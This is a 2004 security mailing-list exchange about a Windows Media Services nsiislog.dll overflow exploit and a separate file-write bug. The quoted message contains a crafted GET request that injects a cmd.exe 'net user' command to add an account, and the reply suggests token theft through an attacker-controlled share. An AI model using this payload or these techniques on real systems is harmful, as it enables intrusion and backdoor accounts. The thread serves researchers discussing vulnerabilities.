Re: New mediaservices sploit

[Dave Aitel <dave () immunitysec com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:

| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since its in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?


Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

|
| Brett actually found three bugs in this ISAPI; the original chunked
|  encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.


|
| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET
|
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%
|  
| 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
|  20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD


You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\
and steal the token and relogin through NTLM auth?

- -dave



|
| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|>  accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.
|>  c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>
|> _______________________________________________ Dailydave mailing
|> list Dailydave () lists immunitysec com
|> http://www.immunitysec.com/mailman/listinfo/dailydave
|
| _______________________________________________ Dailydave mailing
| list Dailydave () lists immunitysec com
| http://www.immunitysec.com/mailman/listinfo/dailydave


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR
q3eaEdpJZeuG97kHz07TkOU=
=E4yX
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave